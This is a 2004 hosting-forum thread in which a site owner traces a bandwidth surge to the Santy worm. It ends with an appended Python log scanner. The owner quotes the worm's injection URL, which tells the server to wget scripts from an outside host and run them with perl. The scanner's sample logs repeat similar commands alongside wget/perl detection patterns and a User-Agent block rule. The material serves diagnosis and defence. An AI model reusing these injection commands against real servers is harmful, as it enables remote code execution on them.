Bandwidth usage boom, from 100 MB to 1200MB / day


Post by Andrei P. » Mon Dec 27, 2004 3:58 am

In December the number of my daily visitors for my website dropped from 1000 to 700. My daily bandwidth usage is around ~100MB, so 3000MB / month.

Today I logged in to check my stats, and what do I see?
25 Dec 2004 - 425 visitors - 868.54 MB

And the stats for yesterday (Sunday) counted 1243.39 MB!

So there's something fishy going on here, maybe some exploit on my website that someone is using... I only have a tad until I get to my bandwidth limit, so I'm somewhat desperate.

If anyone has any ideas...
Andrei P.
 
Posts: 18
Joined: Tue Aug 31, 2004 4:35 am

Post by 2WDHost.com » Mon Dec 27, 2004 4:02 am

Hi Andrei.

We are looking into the stats on your account and will update you shortly.

Thank you for this request.
Regards,
www.2WDHost.com
Professional Hosting
2WDHost.com
Site Admin
 
Posts: 2084
Joined: Thu Jan 15, 2004 4:34 pm

Post by 2WDHost.com » Mon Dec 27, 2004 5:47 am

Andrei,

We've found that most of the bandwidth on your site for the past 2 days has been used by requests accessing the http://www.geekpedia.com/prog_ttrls_list.php/ dir.

There is a huge number of hits for this dir, while the number of visitors is much lower, so we are looking for which IPs had the largest number of hits on the mentioned dir over the past 2 days.

We will update you with the results shortly.

Thank you.
Regards,
www.2WDHost.com
Professional Hosting
2WDHost.com
Site Admin
 
Posts: 2084
Joined: Thu Jan 15, 2004 4:34 pm

Post by Andrei P. » Mon Dec 27, 2004 6:09 am

Hi 2WDH,

Thank you for your prompt response.

I also looked in the stats (AWStats, Webalizer) for an IP that did a big amount of traffic, however I didn't find any that made traffic of over 100 MB.
Andrei P.
 
Posts: 18
Joined: Tue Aug 31, 2004 4:35 am

Post by 2WDHost.com » Mon Dec 27, 2004 6:13 am

Andrei,

You are correct, and there are multiple IPs "crawling" your pages and generating such an amount of traffic.

However, we've found that the goal of those crawlers is to try to inject some code through your pages to the server.

We will contact you on IM to discuss it, to speed up the process.

Thank you.
Regards,
www.2WDHost.com
Professional Hosting
2WDHost.com
Site Admin
 
Posts: 2084
Joined: Thu Jan 15, 2004 4:34 pm

Post by 2WDHost.com » Mon Dec 27, 2004 6:17 am

Andrei,

Could you please log on to MSN now to discuss the issue ASAP?

Looking forward to your reply.

Thank you.
Regards,
www.2WDHost.com
Professional Hosting
2WDHost.com
Site Admin
 
Posts: 2084
Joined: Thu Jan 15, 2004 4:34 pm

Post by Andrei P. » Mon Dec 27, 2004 7:24 am

Note for others that may have the same problem:

I discussed with 2WDH on IM and he discovered that the problem was the new "Santy" worm.

Currently we agreed to ban "wget", which is found in the URL that the worm uses, attempting to inject code in the pages (in my case):

/prog_ttrls_list.php/reviews_list.php?PHPSESSID=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt

VisualCoders was just an infected site, but there are many others.

Currently I'm trying to find a solution for banning "wget" (using .htaccess) and I'll post it here as soon as I find it.
Andrei P.
 
Posts: 18
Joined: Tue Aug 31, 2004 4:35 am

Post by Andrei P. » Mon Dec 27, 2004 8:27 am

The most popular solution I've found is using the following in .htaccess:

Code:
SetEnvIfNoCase User-Agent ".*lwp.*" spambot=1
<Limit GET POST PUT>
Order allow,deny
deny from env=spambot
allow from all
</Limit>


I've tried this, yet I'm not sure if it works.
Andrei P.
 
Posts: 18
Joined: Tue Aug 31, 2004 4:35 am

Post by Andrei P. » Tue Dec 28, 2004 4:17 am

Well, it seems like the problem was fixed by using the lines above. The traffic is getting back to normal:

Image

Thank you for your support, 2WDH and Happy New Year!
Andrei P.
 
Posts: 18
Joined: Tue Aug 31, 2004 4:35 am

Post by dryink » Thu May 26, 2005 7:01 pm

A very similar thing has just occurred to me with my bandwidth usage... I'm not sure what the cause of the sudden jump is... perhaps the same thing
dryink
 
Posts: 49
Joined: Tue Dec 07, 2004 1:10 am

Post by 2WDHost.com » Fri May 27, 2005 5:08 am

Hi Dryink.

Could you please check your logs for the wget line occurrence to determine if that's the same issue, and, if it is, perform the actions discussed in this thread?

Thank you for using our services.
Regards,
www.2WDHost.com
Professional Hosting
2WDHost.com
Site Admin
 
Posts: 2084
Joined: Thu Jan 15, 2004 4:34 pm
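
The log check asked for above, as an added example that is not part of the original thread: a Python scan of Apache combined-format access-log lines that URL-decodes each query string, flags requests carrying the "wget"/"perl" commands or a remote URL as a parameter value (as in the request Andrei quoted), and totals requests, bytes and distinct IPs per path. It also counts flagged requests whose User-Agent the thread's ".*lwp.*" rule would not match. The log lines, IP addresses and the infected.example host are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed Apache "combined" log lines (documentation IPs, placeholder host),
# modelled on the request quoted in the thread.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Dec/2004:03:10:01 +0000] "GET /prog_ttrls_list.php/reviews_list.php?PHPSESSID=http://infected.example/spy.gif?&cmd=cd%20/tmp;wget%20infected.example/worm1.txt;perl%20worm1.txt HTTP/1.1" 200 48211 "-" "LWP::Simple/5.803"',
    '203.0.113.21 - - [26/Dec/2004:03:10:04 +0000] "GET /prog_ttrls_list.php/reviews_list.php?PHPSESSID=http://infected.example/spy.gif?&cmd=cd%20/tmp;WGET%20infected.example/worm1.txt HTTP/1.1" 200 47990 "-" "Mozilla/4.0 (compatible)"',
    '192.0.2.55 - - [26/Dec/2004:03:11:30 +0000] "GET /prog_ttrls_list.php?page=2 HTTP/1.1" 200 15320 "-" "Mozilla/5.0 (Windows; U)"',
]

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
                  r'\d{3} (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"')
# Shell commands named in the thread's request, matched after URL-decoding.
COMMAND = re.compile(r'(?:^|[;&|=\s])(?:wget|perl)\s', re.I)
# A remote URL passed as a parameter value (PHPSESSID=http://... in the thread).
REMOTE_VALUE = re.compile(r'=(?:https?|ftp)://', re.I)
# Same pattern as the thread's SetEnvIfNoCase User-Agent ".*lwp.*" rule.
UA_RULE = re.compile(r'.*lwp.*', re.I)

def scan(lines):
    """Group suspicious requests by path: count, bytes, distinct IPs, UA-rule misses."""
    hits = defaultdict(lambda: {"requests": 0, "bytes": 0, "ips": set(),
                                "ua_rule_misses": 0})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        path, _, query = m["url"].partition("?")
        decoded = unquote(query)
        if not (COMMAND.search(decoded) or REMOTE_VALUE.search(decoded)):
            continue
        h = hits[path]
        h["requests"] += 1
        h["bytes"] += int(m["bytes"]) if m["bytes"].isdigit() else 0
        h["ips"].add(m["ip"])
        if not UA_RULE.search(m["ua"]):
            h["ua_rule_misses"] += 1  # flagged URL, but User-Agent lacks "lwp"
    return dict(hits)

if __name__ == "__main__":
    for path, h in scan(SAMPLE_LOG).items():
        print(path, h["requests"], "requests,", h["bytes"], "bytes,",
              len(h["ips"]), "IPs,", h["ua_rule_misses"], "not matched by the lwp rule")
```

Per-IP totals stay small when the requests come from many addresses, so grouping by path and decoded URL content surfaces what the per-IP stats in the thread did not.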

